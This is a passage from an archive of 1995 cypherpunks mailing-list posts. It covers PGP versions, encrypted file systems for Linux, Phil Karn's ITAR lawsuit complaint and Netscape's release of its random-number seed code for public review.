> While the enthusiasm for increasing the number of remailers is
> understandable, the operation of more than one Mixmaster by the same
> person is downright dangerous, because it reduces the effective lenght of
> the remailer chain. The message that you sent through five remailers may
> have only been handled by two operators. When you thought that five people
> had to colaborate to trace your email, only two are in fact required to do
> so.
> 
> Comments?
> 
> -- 
> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Sun, 24 Sep 95 21:51:52 PDT
To: lethin@ai.mit.edu (Rich Lethin)
Subject: Re: macworld crypto articles
In-Reply-To: <199509241745.NAA20271@toast.ai.mit.edu>
Message-ID: <9509250445.AA19394@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain



> In article <4444rl$nrh@life.ai.mit.edu> Chen writes:
> > It's truly a deplorable state of affairs.
> 
> For the next version, include PGP free with every version of Quicken,
> and have Quicken just "call" PGP.
> 
> Of course, users can encrypt their files now with PGP.  Is there an
> Intuit bboard where someone could post instructions?

This is a good idea.  I'll bring it up with the appropriate people.

Right now, we only have some cheesy forums going on Compuserve and
Prodigy; however, keep your eyes peeled.  We have other stuff in the
works.

   - Mark -


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike_Spreitzer.PARC@xerox.com
Date: Sun, 24 Sep 95 22:30:44 PDT
To: cypherpunks@toad.com
Subject: secure file system for Linux?
Message-ID: <95Sep24.223025pdt."15556(4)"@alpha.xerox.com>
MIME-Version: 1.0
Content-Type: text/plain


Is there a secure file system (or secure directory branch) for Linux?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bret@bjohns.win.net (Bret A. Johnson)
Date: Sun, 24 Sep 95 19:59:07 PDT
To: cypherpunks@toad.com
Subject: What version of PGP?
Message-ID: <1903@bjohns.win.net>
MIME-Version: 1.0
Content-Type: text/plain


I got PGP 262 off MIT.

The file was PGP262si.tar

Is this the international version with week crypto? os is it the US
version?

Thanks....
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mch@squirrel.com (Mark C. Henderson)
Date: Sun, 24 Sep 95 23:08:06 PDT
To: cypherpunks@toad.com
Subject: Re: secure file system for Linux?
Message-ID: <199509250608.XAA17676@squirrel.com>
MIME-Version: 1.0
Content-Type: text/plain


> Is there a secure file system (or secure directory branch) for Linux?

Yes, you can use CFS, which works on several versions of UNIX as well
as Linux.

Send email to cfs@research.att.com to get a copy. Someone exported
it, and it is also available from
ftp://ftp.hacktic.nl/pub/crypto/CRYPTOapps/cfs.1.3.tar.gz

There is also something called the "loop filesystem" for Linux. I haven't
tried it and don't know how well it would integrate into the newer
Linux kernels. ftp://tsx-11.mit.edu/pub/linux/BETA/loop

-- 
Mark Henderson -- markh@wimsey.bc.ca, henderso@netcom.com, mch@squirrel.com
PGP 1024/C58015E3 fingerprint=21 F6 AF 2B 6A 8A 0B E1 A1 2A 2A 06 4A D5 92 46
cryptography archive maintainer  --  ftp://ftp.wimsey.com/pub/crypto
ftp://ftp.netcom.com/pub/he/henderso/change-sun-hostid-1.5.0.tar.gz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sun, 24 Sep 95 20:50:11 PDT
To: rsalz@osf.org
Subject: Re: Defense against a class of programming bugs
Message-ID: <9509250349.AA27055@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Unfortunately, strdup is not posix compliant.  If you want to use
>it and maintain portability, you'll have to write your own.

Er, you're kidding, right?  drand48 isn't in Posix either, for example.
Someone who runs on Motif and Mac has strdup as the least of their
worries.  But just in case it's stopping anyone:
	char *strdup(const char *x) { char *p;
	    return (p = malloc(strlen(x) + 1)) ? strcpy(p, x) : 0;
	}
(Deliberately written too-cleverly.  Lame compilers will need to cast to 0)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Sun, 24 Sep 95 20:50:36 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: John Deutsch
Message-ID: <Pine.A32.3.91.950924234920.4788G-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Is coming to Yale tomorrow and I'm going to get the opportunity to have 
tea with him(and about 10 other folks).

Is there anyone here that has anything that they want me to ask the man?  

Ben.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMGYm+r5ALmeTVXAJAQFeIQL9FmuCB93W4XANBdyQBOg224WW/sVetRI8
AZhM3HHjvNJ41YT7LCnRjLeRU1nUeBX1cI5MWBLNmKQXqR8+XmqboVU/k3jOxndy
bNhH4rqb/zgH1cD65lo7IbTsVOJoHeDe
=18Lm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 24 Sep 95 20:57:27 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Patents and trade secrets was: Encryption algorithms used in
In-Reply-To: <306319E6@hamachi>
Message-ID: <9509250357.AA21926@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


David van Wie misattributed thus:

> Perry E. Metzger at Sep 22, 95 01:19:37 am wrote:
> 
> >David Van Wie writes:
> >> It just moves the prior art date from the date of invention to the date
> >> of filing the patent application.
> 
> >What happens if the chronology goes like this ?
> >
> >(0) Alice invents a snaffleblort.
> >(1) Bob invents a snaffleblort.
> >(2) Bob files for a patent on a snaffleblort.
> >
> >From what you said, it would appear that Alice's prior art won't count when
> >it comes to considering the validity of Bob's patent claim. Is that correct 
> ?

I actually asked those questions, not Perry. Check your attributions, please.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sun, 24 Sep 95 21:03:36 PDT
To: owner-cypherpunks@toad.com
Subject: Re:  John Deutsch
Message-ID: <9509250402.AA27079@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Is there anyone here that has anything that they want me to ask the man?  

Why did he argue against MIT getting rid of Lincoln Labs?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 25 Sep 95 00:05:17 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape giving away T-shirts?
Message-ID: <199509250705.AAA26210@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:33 PM 9/24/95 -0700, you wrote:
>	My ex-gf just told me on the phone that her boss mentioned
>that Netscape was giving away T-shirts to people who found holes.
>Apparently her boss saw this on the news. Interesting. ;-)
>
>	(For the over-stressed and/or humor-impaired: I'm not implying
>that netscape is giving away t-shirts, just commenting on the accuracy
>of the media.)

Concidering that they do give out a fair amount of shirts, they might
actually be doing this now.  (If it was for bugs they would owe me quite a
few shirts. ];>)

If they offer you a shirt, ask for one of the "Mosaic Communications
Corporation" t-shirts.  (The one with the old version of Mozilla on the
back.)  They are evidently considered a status symbol at Netscape corporate.
(And, no, you cannot have mine.)

|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hroller Anonymous Remailer <hroller@c2.org>
Date: Mon, 25 Sep 95 00:11:09 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509250706.AAA26206@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


<Yet Another Alarmist TV Show About Child Molesters on the Net:
<snip>
<Anyway, the mainstream media trashing of the Net continues.

And the trashing will continue.  It is the classic scenario.
Feed the media negative press clips about the entity you wish
to discredit (here, the Net), e.g.:
1.  All those pedophiles out to lure your children;
2.  Big coverage on catching some of those pedophiles;
3.  First page coverage on breaking Netscape's code with the
    headlines that your sensitive information such as your
    credit card numbers, etc. can be retrieved (ignoring that
    the reason was to show Netscape's poorly structered code
    would allow this and, therefore, preventing it before it
    could happen);
4.  Expect cryptology to crop up in the Oklahoma bombing trial.
    There already has been articles of those involved having
    allegedly used that *damned* Net to correspond.

Now, the stage is set.  The general public will demand that the
Net (the bastion of perverts and radicals) be controlled,
monitored, and censored - all as a result of a carefully
planned methodology of those specific powers that be.  Having
the general public believe that their children and the national
security are being threatened makes it a much easier task for
*them* to attain their goals.  After all, who wants to be
bothered with proposed legislation when you can have Jane and
John Doe yelling for what may have taken *them* a while to 
attain by "normal" routes?
Never underestimate....


Pathfinder







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc>
Date: Sun, 24 Sep 95 22:22:41 PDT
To: cypherpunks@toad.com
Subject: Colin Powell coming to Dallas
Message-ID: <199509250514.AAA12608@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Colin Powell will be in Dallas at the Taylor's Bookstore out on Belt Line 
Rd. and Prestonwood (right next to Prestonwood Mall).  October 3 at 6 
PM.  I plan to be there - anyone else from the DFW area going?  Anyone 
have any questions they want asked (other than the usual "where do you 
stand on the administration's position regarding the use and exportation 
of so-called 'strong crypto' and the Clipper/Capstone fiasco"?
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGY6vSS9AwzY9LDxAQGLeQP/R9wlGd5wRImcP/37nX9oxAA8+ob2+QHX
uCSgdVQOBEYWCEcUXXioa4YgOJx/aptrQBUI23IudEJMMbXTVnQeZx8DPFbzLERI
cva9aHTVcQwp/tqOa8NSjvm5UtOC9YtSlyyfFDaH4Amai2dYUPFFZXhhLp6O6jLt
PZ56cNfMRYk=
=iIKo
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 24 Sep 95 21:28:51 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Net KiddiePorn Hype on TV
Message-ID: <9509250428.AA22310@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Yet Another Alarmist TV Show About Child Molesters on the Net:

During their coverage of an NFL game on Sunday, the Fox announcers plugged
an upcoming episode (sometime this week) of _New York Undercover_. They
used a depressing line like "Think the Net is a safe place to play ?  Think
again !"  Apparently the show will portray a child molester luring kids via
the Net, etc., etc. "In a story pulled straight from today's headlines !"

Anyway, the mainstream media trashing of the Net continues. Check your local
listings.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc>
Date: Sun, 24 Sep 95 23:52:53 PDT
To: Mike_Spreitzer.PARC@xerox.com
Subject: Re: secure file system for Linux?
In-Reply-To: <95Sep24.223025pdt."15556(4)"@alpha.xerox.com>
Message-ID: <199509250630.BAA14157@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> Is there a secure file system (or secure directory branch) for Linux?

The only one I know of is Matthew Blaze's CFS.
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGZMgiS9AwzY9LDxAQFChwQAofOU1QkLKwhYYxO7GFvmFk03w3mFv/nb
J4QIkpFK85m1GIjlgl1rwb5sOWWoMkE/OeSRWQ6hm7OhF5VWl9NdfbqDJJBZO7pf
OUj1YjlegF3s1hFDyqv0qIgceSqhN5tEVtA6K5jdOP1mTNF/L8ODmcMKIHzrArD7
UEFKaUd5XiU=
=17aw
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Mon, 25 Sep 95 01:35:10 PDT
To: cypherpunks
Subject: Phil Karn's legal case is filed; here's the Complaint.
Message-ID: <9509250835.AA05551@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Full info is at http://www.qualcomm.com/people/pkarn/export/index.html.

UNITED STATES DISTRICT COURT
FOR THE DISTRICT OF COLUMBIA

____________________________________
                                                )
PHILIP R. KARN, JR.                             )
7431 Teasdale Avenue                            )
San Diego, California  92122                    )
                                                )
                Plaintiff,                      )
                                                )
        v.                                      )
                                                )
U.S. DEPARTMENT OF STATE                        ) Case 1:95CV01812
2201 C Street, N.W.                             )
Washington, D.C.  20520                         )
                                                )
        and                                     )
                                                )
THOMAS E. MCNAMARA                              )
Assistant Secretary                             )
Bureau of Political-Military Affairs            )
U.S. Department of State                        )
Room 7325                                       )
2201 C. Street, N.W.                            )
Washington, D.C. 20520                          )
                                                )
                 Defendants.                    )
                                                )
____________________________________            )

COMPLAINT

COMES NOW the plaintiff PHILIP R. KARN, JR., by and through his undersigned
counsel of record, and for his causes of action against the named Defendants
states the following:

1. Plaintiff PHILIP R. KARN, JR. is a resident of San Diego, California.

2. Defendants, U.S. DEPARTMENT OF STATE and THOMAS E. MCNAMARA, Assistant
Secretary of the U.S. Department of State of the United States of America,
proceeded against in his official capacity, are charged with, inter alia,
the administration of the Arms Export Control Act ("The Act"), 22 U.S.C.
2778 et seq., and the International Traffic in Arms Regulations ("The ITAR")
22 C.F.R. Subchapter M. (Subsequent citations to the ITAR are with a section
designator only.)

3. This is an action for a declaratory judgment pursuant to 28 U.S.C. 2201,
for the purpose of determining a question of actual controversy between the
parties as is herein more fully set forth.

Jurisdiction and Venue

4. Jurisdiction of this action is based on 28 U.S.C. 1331, in that it is a
civil action arising under the laws of the United States, and the First and
Fifth Amendments to the Constitution of the United States.

5. Venue is proper in this Court pursuant to 28 U.S.C. 1391, in that this is
a civil action against an officer of the United States and the decisions,
which are the subject of this action, were made within the District of
Columbia.

Causes of Action

6. Plaintiff KARN hereby realleges and incorporates by reference, as though
fully set forth herein, the allegations of paragraphs 1-5.

7. The ITAR is implemented by the Office of Defense Trade Controls ("the
Office").

8. Under  120.2 of the ITAR, the Office is responsible for reviewing and
determining whether particular products and technologies are defense
articles, as defined at  120.6, technical data, as defined at  120.10, or
defense services, as defined at  120.9, and, therefore, subject to the
prior export licensing requirements of the ITAR. Such articles, services and
technical data are described in  121.1, which is styled the United States
Munitions List ("the USML"). Products and technologies, which are neither
defense articles nor defense services, as defined in the ITAR, are subject
to the export licensing jurisdiction of the Department of Commerce.

9. The ITAR provides a procedure for the determination of whether a
particular product or technology is subject to its licensing requirements.
See  120.4. Upon receipt of a written Commodity Jurisdiction Request, a
determination is made as to whether an item is included on the USML. A
"commodity jurisdiction" procedure entailing consultations among the
Departments of State, Commerce, and Defense is used to make the
determination.

10. Under  120.10, information that is in "the public domain" is not
subject to the ITAR's export licensing controls.

11. Pursuant to  120.4, Plaintiff KARN on February 12, 1994 initially
submitted a Commodity Jurisdiction Request for Applied Cryptography, a book
("the Book") by Bruce Schneier, which was published in this country.

12. The Book was published by John Wiley & Sons, Inc. It is available from
most bookstores that carry computer books and has a list price of $44.95. It
has sold approximately 20,000 copies worldwide.

13. The Book contains computer source codes, detailed descriptions and
instructions on how to use a wide variety of cryptographic algorithms, and
explains how computer programmers designing computer applications, networks
and storage systems can use cryptography to maintain the privacy and
security of computer data.

14. Cryptography is a mathematical technique used to protect the secrecy of
electronic communications between individuals by scrambling, or encrypting,
communications so that only particular recipients with a "key" to decrypt
the communications may decipher them. Cryptographic software programs that
protect the confidentiality of electronic communications are created by
using programming instructions, or source code algorithms. These are
sophisticated mathematical equations that are expressed in computer source
code and converted into computer programs. Cryptography has a variety of
commercial uses including confidentiality of electronic mail, computer
software, voice, video and other information in digitized form.

15. Part Five of the Book contains a full-text actual source code listing
for fourteen cryptographic algorithms in the C programming language, which
were developed by various sources at various times using both private and
public sources of funding. A two- disk cryptographic source code set ("the
Diskette Set"), which includes the same codes printed on pages 456-570 of
Part Five of the Book, is offered for sale on its last page.

16. Binary copies of several of the source code algorithms published in Part
Five of the Book are also publicly available from anonymous file transfer
protocol ("FTP") sites outside the United States.

17. In a letter dated March 2, 1994, the Office concluded that the Book,
including the source code in Part Five, was in "the public domain." The Book
was accordingly transferred to the export jurisdiction of the Department of
Commerce, where it is eligible for export to all destinations under a
general license. (A general license is one which is generally available and
need not be specifically applied for in advance of any export.)

18. The March 2, 1994 ruling from the Office expressly did not extend to the
Diskette Set.

19. On March 9, 1994, Plaintiff KARN submitted a second Commodity
Jurisdiction Request ("the Second Filing") for a determination as to whether
a Diskette ("the Diskette") containing only the source code information, as
set out in Part Five of the Book, was subject to the export licensing
requirements of the ITAR. The only difference between the information
contained on the Diskette and Part Five of the Book is the medium-used:
magnetic pulses on Mylar instead of inked characters on paper.

20. Plaintiff KARN is desirous of exporting the Diskette to fulfill his
interest in the dissemination of cryptographic information.

21. The Office responded to the Second Filing on May 11, 1994 and stated
that the Diskette is a defense article under Category XIII(b)(1) of the USML
and, therefore, subject to the export licensing jurisdiction of the ITAR.

22. On June 7, 1994 Plaintiff KARN appealed the May 11, 1994 determination
of the Office to the Deputy Assistant Secretary of State for Export Controls
("the DAS").

23. On October 7, 1994 the DAS responded to Plaintiff's appeal by affirming
the Office's determination and concluding that the Diskette was a defense
article because it was cryptographic software, notwithstanding the fact that
the information it contains is identical to that in the Part Five of the
Book.

24. Pursuant to  120.4(g), the DAS's determination was appealed to the
Assistant Secretary of State for Political-Military Affairs on December 5,
1994.

25. On June 13, 1995 the Assistant Secretary of State for Political-Military
Affairs ("the Assistant Secretary") reaffirmed the DAS's determination but
failed to address the fact that the information contained in the Diskette is
identical to that in Part Five of the Book, which was already found not to
be subject to the licensing jurisdiction of ITAR.

26. No additional appeals mechanism is set forth in the ITAR with respect to
commodity jurisdiction determinations.

27. Plaintiff has exhausted his administrative remedies, therefore, this
matter is "ripe" for judicial review.

28. The application of the ITAR provisions to Plaintiff KARN, which require
the application for and issuance of a license prior to any export, has
caused him unusual hardship and irreparable injury in that he has been and
is currently being denied the free exercise of constitutional rights as more
fully stated below. Plaintiff has no adequate remedy at law for these
injuries; accordingly, he is entitled to declaratory relief.

29. The actions of Defendants restricting the dissemination of information
contained on the Diskette, which is identical to the information contained
in Part Five of the Book, are arbitrary and capricious, constitute an abuse
of discretion and are otherwise not in accordance with the Administrative
Procedure Act ("the APA") at 5 U.S.C. 706(2)(A).

30. As set forth below, the actions of Defendants restricting the
dissemination of information contained on the Diskette, which is identical
to the information contained in Part Five of the Book, are contrary to
Plaintiff's constitutional rights and, therefore, not in accordance with the
APA at 5 U.S.C. 706(2)(B).

31. The Office's determination, and its subsequent reaffirmation by the DAS,
and the Assistant Secretary subjecting the Diskette to export licensing
controls when the information it contains is identical to the published text
of Part Five of the Book, which was deemed not subject to such export
controls, is irrational, arbitrary, and capricious. These arbitrary and
capricious actions violates Plaintiff's Fifth Amendment right to substantive
due process.

32. The Office's determination, and its subsequent reaffirmation by the DAS
and the Assistant Secretary, to control the export of the Diskette
containing information set forth in a published book is a violation of
Plaintiff's fundamental First Amendment right to free speech.

33. As applied by Defendants, the ITAR requires Plaintiff to apply for a
license to export the Diskette containing information identical to that in
Part Five of the Book. Therefore, as applied to Plaintiff in this instance,
the prior licensing requirement of the ITAR operates as a prior restraint on
Plaintiff's disclosure of ideas and information in violation of his First
Amendment rights to free speech.

34. As applied to Plaintiff,  120.4 dealing with the determination of
whether particular products and technologies are defense articles, is
unconstitutionally overbroad and vague, as it includes within its scope
speech protected by the First Amendment, namely material contained in the
Book, thereby chilling the exercise of free speech rights.

Prayer for Relief

WHEREFORE, Plaintiff KARN prays for judgment against Defendants, U.S.
DEPARTMENT OF STATE and MCNAMARA, as follows:

A. Declaring that the provisions of the ITAR, as applied to Plaintiff KARN,
be declared null and void, of no effect, as unconstitutional under the Fifth
and First Amendments.

B. Declaring that the determination to subject the Diskette to the export
licensing controls of ITAR is unlawful in violation of the APA at 5 U.S.C.
706(2)(A) & (B).

C. For attorneys fees incurred herein.

D. For costs of the action incurred herein and

E. For such other and further relief as the Court deems just and proper.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Sun, 24 Sep 95 22:50:05 PDT
To: bret@bjohns.win.net (Bret A. Johnson)
Subject: Re: What version of PGP?
In-Reply-To: <1903@bjohns.win.net>
Message-ID: <199509250549.BAA20660@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I got PGP 262 off MIT.
> 
> The file was PGP262si.tar
> 
> Is this the international version with week crypto? os is it the US
> version?

Actually, the file you got was pgp262s.tar.gz (or something equivalent.)
Inside this tarfile you found pgp262si.tar, which is the Source, Internal
tarfile.  It is not am international version; it is the US version.

Also, neither the US version nor any international versions have weak 
crypto.

Enjoy!

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc>
Date: Mon, 25 Sep 95 00:25:41 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Netscape for Linux?
In-Reply-To: <445hso$h03@tera.mcom.com>
Message-ID: <199509250712.CAA01003@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> In article <199509242006.PAA02258@khijol>, khijol!erc@uunet.uu.net (Ed Carp [khijol SysAdmin]) writes:
> > > > And the sad part is that now that they have announced that they are
> > > > dropping their unofficial Linux support, 
> > > 
> > > I have no current plans to alter our treatment of Linux.  It is not now,
> > > nor has it ever been, a supported platform.  We do build for it,
> > > and some people are happy about that.
> > 
> > Does this mean that a Linux version of Netscape will no longer be 
> > available, or that it *will* be available but unsupported?
> 
>   It will be available as it has been in the past, which means unsupported.
> That means that if you have a bug, and you try to call us for help,
> we will not provide it.

As much as this might put me ad odds with certain parts of the CP
community, this seems quite reasonable to me.  After all, why should
someone provide support for a platform which is not generating revenue? 

> > > I have not constructed a business case which would cause Netscape
> > > to begin support for Linux versions of the Navigator.  Right now, I'm 
> > > not sure that making a point of this would do what you want.
> > 
> > That all depends on what you mean by "support".  If you mean "we will no 
> > longer make Netscape available for the Linux platform", that's not 
> > support.  If you mean "we will no longer respond to bug reports for 
> > Netscape on this platform" then that's discontinuing support.
> 
>   We have never officially responded to bug reports on Linux.  We do not
> take money for it for just this reason.  This does not mean that we will
> not fix bugs that are reported via our feedback page.  It doesn't mean
> we will fix them either...

Understood.  Thanks for the clarification :)
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGZWZCS9AwzY9LDxAQEacgQAmiibHw4Wn4JAudLHJ66dQDJhDoUMjzsR
Oh4cd7aYHL4PkSgb7INfS+mMQZ6/VYu7VTHVJchNAU5DxO0A7tljrbMnt+QWWjSx
5pEU0t5jRIScLhBdANSf24YfmBpc929gfUOkSldm0OopsAT9kurPY8qg1Yd/aVjs
XB7m9h/1BxE=
=wO2X
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Mon, 25 Sep 95 00:30:00 PDT
To: Mike_Spreitzer.PARC@xerox.com
Subject: Re: secure file system for Linux?
In-Reply-To: <95Sep24.223025pdt."15556(4)"@alpha.xerox.com>
Message-ID: <Pine.SUN.3.90.950925022726.7974A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Crypto Filesystem works just fine.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Sun, 24 Sep 1995 Mike_Spreitzer.PARC@xerox.com wrote:

> Date: Sun, 24 Sep 1995 22:29:48 PDT
> From: Mike_Spreitzer.PARC@xerox.com
> To: cypherpunks@toad.com
> Cc: Mike_Spreitzer.PARC@xerox.com
> Subject: secure file system for Linux?
> 
> Is there a secure file system (or secure directory branch) for Linux?
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: karlton@neon.netscape.com (Phil Karlton)
Date: Sun, 24 Sep 95 19:39:47 PDT
To: cypherpunks@toad.com
Subject: Netscape "random" number seed generator code available
Message-ID: <4454nu$da8@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Once again I speak for myself and not Netscape.

The random number seed generation code is now available for review:
	ftp://ftp1.netscape.com/pub/review/RNGsrc.tar.Z
The README from that file is appended below.

Netscape has fixed other less glaring but potentially interesting
problems and those fixes will be included with the patch that goes out
in the near future.

As is mentioned in the README, more will need to be done to find more 
bits of entropy. (Too much of a good thing is still not enough.) 
However the security team believes that the RNG seed is no longer the 
weak link and candidate for attack.  So I am personally volunteering 
to have my had shaved if a discovered deficiency in this code results 
in an easily attacked generated seed. [You will be expected to show 
your work. :-)]


============================== README ===========================

This code represents the heart of Netscape's random number seed 
generator. The initialization routines are called by the various 
client front ends and servers and other Netscape software.  
Furthermore, the server will be putting seed information into the 
environment of each of the CGI invocations.

Here's some things a client does:
* Application specific files are passed to SEC_FileForRNG(). For the
client this includes the global history file. 
* The clients then read a portion of the screen depending upon the
current state of the hash.
* The Update functions feed into an MD5 hash. The MD5 code isn't ours
to publish.
* User input is used for server side key generation and in client 
front ends for increasing RNG state entropy over time.

This code needs to be portable. We can't access device specific
registers that are not guaranteed to be on all relevant platforms.

Recommendations to users of Netscape who rely on the security of
their transactions:

    If the attacker has physical access to your machine, security
    cannot be assured.

    Netscape continues to point out that if unwanted agents can log 
    into your machine, little can be secure.  For secure servers, any 
    insecure connection mechanism could be suspect.  Multi-user UNIX 
    platforms will not be as secure as single-user machines. 

	Details: Some of the system specific information that is used
	in the seed generation is available to any user on that
	system.

	To help mitigate this, the entire user environment is passed
	into the seed generation algorithm.  A wary user can alter his 
	user environment before running Netscape software.

	If someone can get root (superuser) access to your machine, 
	they can pretty much do anything.

    Netscape security could be weak if run on a platform emulator.
    Use a version native to the platform on which you are running.

	Details: Some of the usefulness of the seed generation depends
	upon the unpredictability of the low order bits of various
	clocks and timers. The clocks of many emulators may have 
	much less entropy than the actual builtin clocks.

    If you are running on a UNIX platform, make sure of the security
    of your X server.  This is also true if the X connection is not to 
    a local machine as all of the events and the data from the screen 
    read may be captured from the ethernet.

	Details: If the attacker is monitoring your user input then
	its randomness is not useful.

    It is better to perform some user action before connecting to a 
    secure site.  This means you should not set your home page to a 
    secure site or launch your client from a command line to a secure site.

	Details: While navigating through menus or typing into various form 
	fields, the Navigator uses the unpredictability of details of the 
	user actions to increase the entropy of the RNG state.

For this patch, proposed changes had to fit into the existing
code and UI structure.  We will rely on the user interactions leading 
to the initial secure page.

In future versions, the Navigator will force the user to explicitly
use the keyboard or mouse to help generate the initial seed before
doing any secure transactions. That seed will be maintained across
invocations of the Navigator.

The files are not compilable as is. They have been extracted from the
Netscape's cross platform build environment, and all of the headers
needed to compile them are not included.  They should be compilable
with some simple edits on their platforms (MFC on Windows, CodeWarrior 
on Mac).
=================================================================

PK
-- 
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sun, 24 Sep 95 23:49:16 PDT
To: cypherpunks@toad.com
Subject: New Netscape RNG
Message-ID: <199509250649.CAA27099@clark.net>
MIME-Version: 1.0
Content-Type: text/plain




  I just glanced at the new Netscape RNG source. I don't really see
anything bad, but I haven't analyzed it. However, I'm curious
as to why variables like the username or the language locality
are used as sources of entropy. These seem to provide almost nil.
The username is going to be pretty much constant. In fact, even
the current directory which is used as a seed can't provide more
than a few bits of entropy. In all probability, the user
name will usually be the same, and so will the current directory
(and how many directories are there? 65,000 would only give you
16 bits of entropy, assuming you get a directory listing from the machine)
 
 I'm thinking from the standpoint of someone gathering data on someone
or some server to mount a specific attack. a "most common directories
on the macintosh" file for instance could be used to attack the
current directory method.

  Using those sources probably can't hurt, they just seemed
like odd choices, "grasping for straws" so to speak.

  Nevertheless, I would like to commend Netscape for releasing
the source code for public review. You guys are clearly an intelligent
company, in both your current developments, but also the way
you have handled this bad press.

-Ray

p.s. i hope you guys do a good internal review of your code to remove
buffer overflow bugs

 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nag.cs.colorado.edu>
Date: Mon, 25 Sep 95 02:50:19 PDT
To: cypherpunks@toad.com
